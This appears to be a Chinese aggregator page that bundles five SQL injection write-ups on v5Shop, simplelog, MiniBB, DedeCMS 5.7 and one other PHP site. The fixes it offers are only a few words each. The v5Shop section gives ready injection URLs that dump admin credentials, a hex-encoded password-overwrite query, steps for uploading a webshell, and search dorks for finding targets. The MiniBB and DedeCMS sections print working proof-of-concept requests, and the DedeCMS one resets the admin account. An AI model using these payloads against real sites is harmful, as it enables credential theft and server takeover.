Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复

时间：2025-01-21 03:35:03 作者：libing0727102 综合材料收藏本文下载本文

【导语】“libing0727102”通过精心收集，向本站投稿了5篇Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复，下面小编给大家整理后的Andys PHP Knowledgebase 0.95.4 SQL注入漏洞及修复，欢迎阅读!

目录
第1篇：v5Shop注入漏洞及修复第2篇：simplelog v1.3.1 注入漏洞及修复第3篇：MiniBB 2.5 SQL注入漏洞及修复第4篇：Dedecms注入漏洞分析及修复方法第5篇：skycn分站php注入漏洞及修复

篇1：v5Shop注入漏洞及修复

/commond.aspx?id=1869

没办法union,只能让它暴错了

暴管理员用户名:/commond.aspx?id=1869 and 1=(select top 1 [name] from web_admin)--

暴管理员密码:/commond.aspx?id=1869 and 1=(select top 1 [pass] from web_admin)--

过滤了单引号.只能把字符串转化成16进制的了

更新管理员密码:update web_admin set

pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042

004400450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

拿webshell

切记.千万不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

关键字：services.aspxid=

inurl:scoreindex.aspx

默认后台地址：weblogin/Login.aspx

/weblogin/index.aspx

复制这段代码域名+代码

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

更新管理员密码:update web_admin setpass=0x310042004600410045003700420045004100430046003500360032003300410032004300420044

00450037004400450041003600340042003700430037004300

weblogin/System_Config_Operate.aspx

后台上传水印.可以直接上传大马.

后台拿webshell

切记.不要传ASPX的马......不然不会成功的.

你可以先传ASP的马..再传ASPX马.

马的路径为:uploadFile/Picture/木马.asp

文章作者:黑面小窝

修复：对照过滤

篇2：simplelog v1.3.1 注入漏洞及修复

Simple-Log是基于PHP+MySQL的开源免费博客系统，系统轻巧运行速度飞快并具有很好的可扩展性.

程序下载地址：html“>/ym/201104/27199.html

----------------------------------------------

刚买到vps，打算装个blog系统，看到simple-log比较简洁，就下了最新的装了，，

simplelog v1.3.1 注入漏洞及修复

，

谁知道，偶刚装好，到前台看到搜索就搜了下，没想到真有洞，urldecode惹的祸。

试了下，真可以爆啊，无语了。

再上一张图吧，数据依然可以爆掉。

作者：tojen

篇3：MiniBB 2.5 SQL注入漏洞及修复

MiniBB是一个袖珍型开源PHP论坛软件，MiniBB 2.5中的index.php文件存在SQL注入漏洞，可能导致敏感信息泄露，

[+]info:

~~~~~~~~~

MiniBB 2.5 SQL Injection Vulnerability

Product: MiniBB

Vendor: MiniBB.com ( www.minibb.com/ )

Vulnerable Version: 2.5

Vendor Notification: 21 October 2010

Vulnerability Type: SQL Injection

[+]poc:

~~~~~~~~~

POST /index.php?action=registernew HTTP/1.1

Host: [host]

Referer: [host]/index.php?action=registernew

Content-Type: application/x-www-form-urlencoded

Content-Length: 225

action=register&login=pentest&passwd=pentest&passwd2=pentest&email=pentest%40pentest.com&icq=1%5C%5C&occupation=2%5C%5C&from=3%5C%5C&interest=4%5C%5C&user_viewemail=5%5C%5C&user_sorttopics=6%5C%5C&language=7%5C%5C&login=Login

[+]Reference:

~~~~~~~~~

www.htbridge.ch/advisory/sql_injection_in_minibb.html

www.hack50.com修复：index.php过滤

篇4：Dedecms注入漏洞分析及修复方法

最近看到网上曝出的dedecms最新版本的一个注入漏洞利用，漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中，发现无法复现

最近看到网上曝出的dedecms最新版本的一个注入漏洞利用，漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中，发现无法复现，原因是此漏洞的利用需要一定的前提条件，而原分析文章当中并没有交代这些，所以这里将我的分析过程以及一些触发的必要条件总结了一下。

一. 漏洞跟踪

发布时间：6月7日

漏洞描述：

DedeCMS是一个网站应用系统构建平台，也是一个强大的网站内容管理系统。基于PHP+MySQL的技术架构，完全开源加上强大稳定的技术架构，既可以用来构建复杂体系的企业信息门户或电子商务网站平台，也可以用来管理简单内容发布网站，不管是商务资源门户还是娱乐信息门户，它都是您管理网站的好帮手。

漏洞触发的根源在于dedesql.class.php在调用$GLOBALS[‘arrs1’]、$GLOBALS[‘arrs1’]这两个全局变量之前未对其进行初始化，导致能够覆盖任意全局变量。

漏洞危害：因为dedecms的使用非常广泛，而此漏洞利用方便，危害性高，能够远程获取管理后台，进而直接getshell获取系统控制权。

触发条件：确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll，

如图所示：

受影响版本：dedecms 5.7

二. 漏洞原理

首先说一下dedecms不安全的参数处理机制，这里我们看一下/include/common.inc.php代码的第79行：

foreach(Array(‘_GET’,'_POST’,'_COOKIE’) as $_request)

{

foreach($$_request as $_k =>$_v)

{

if($_k == ‘nvarname’) ${$_k} = $_v;

else${$_k} = _RunMagicQuotes($_v);

}

万恶之源其实就在这里，基本上目前dede被发现的漏洞全都死在这里。我们可以看到，程序从GPC数组中取出名值对后，只是对$_v做了简单的addslashes处理，就直接赋给了${$_k}，实现了类似全局变量覆盖的机制，设计的初衷是为了开发方便，但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题，但是dede的这段代码使php付出的努力全部白费。

下面我们回归漏洞。

首先是/include/dedesql.class.php的第589-600行，

在执行这段代码之前，程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制，利用这段代码我们可以覆盖任意全局变量。例如在这个漏洞中，我们可以控制$GLOBALS['cfg_dbprefix']的值。

然后，我们来看一下如何利用$GLOBALS['cfg_dbprefix']。

这里在/include/dedesql.class.php的第512行SetQuery函数中，代码如下

这里因为$GLOBALS['cfg_dbprefix']是可控的，进而$prefix也是可控的，所以在这儿就造成了SQL注入。

下面跟踪一下整个漏洞的触发过程，这是网上已经公开的PoC：

localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

首先看这个if判断，意思是如果开启了mysqli扩展，则包含dedesqli.class.php，

这里存在漏洞的代码在dedesql.class.php中，所以漏洞利用的前提条件是必须关闭mysqli扩展。

这里跟入dedesql.class.php代码，如图

这里我们传入的arrs1、arrs2两个数组因为还没有被初始化，所以这里$v1、$v2拼接为字符串，如图所示

所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为

admin` SET `userid`=’test’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #

继续跟踪代码执行，

跟入ExecuteNoneQuery2函数，一直跟进SetQuery，如图

这里因为$GLOBALS['cfg_dbprefix']是我们可控的，所以就造成了注入，这里看一下$sql的值，如图所示

因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤，所以这里借助它来注入。执行update成功之后，后台账户为test，密码为admin。

三. 漏洞验证

PoC：